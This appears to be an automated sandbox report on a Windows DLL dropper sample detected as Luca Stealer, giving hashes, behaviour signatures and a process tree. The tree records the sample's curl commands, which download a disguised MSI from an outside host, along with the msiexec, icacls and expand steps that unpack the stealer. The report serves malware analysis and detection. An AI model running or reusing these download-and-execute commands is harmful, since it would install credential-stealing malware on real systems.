Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Overview

General Information

Sample Name: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
Analysis ID: 756307
MD5: 977f29431f9233f22f51b3d27e8abc28
SHA1: 7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256: b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Tags: exe

Detection

Luca Stealer
Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Luca Stealer
Queries memory information (via WMI often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 1096 cmdline: loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 68 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6056 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • cmd.exe (PID: 6020 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • curl.exe (PID: 6088 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
        • cmd.exe (PID: 5180 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • msiexec.exe (PID: 4792 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 6000 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 6012 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 6080 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 6096 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 5804 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 1668 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 4696 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 5272 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 2764 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 1708 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 3660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5260 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 1400 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 4272 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 3560 cmdline: "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 1916 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msiexec.exe (PID: 5104 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 4988 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 4968 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 5736 cmdline: "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 4780 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msiexec.exe (PID: 5396 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 5444 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 5292 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 3928 cmdline: "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 2140 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: UIServices.exe PID: 3560 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | 
Process Memory Space: UIServices.exe PID: 5736 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | 
Process Memory Space: UIServices.exe PID: 3928 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | 

No Sigma rule has matched
No Snort rule has matched
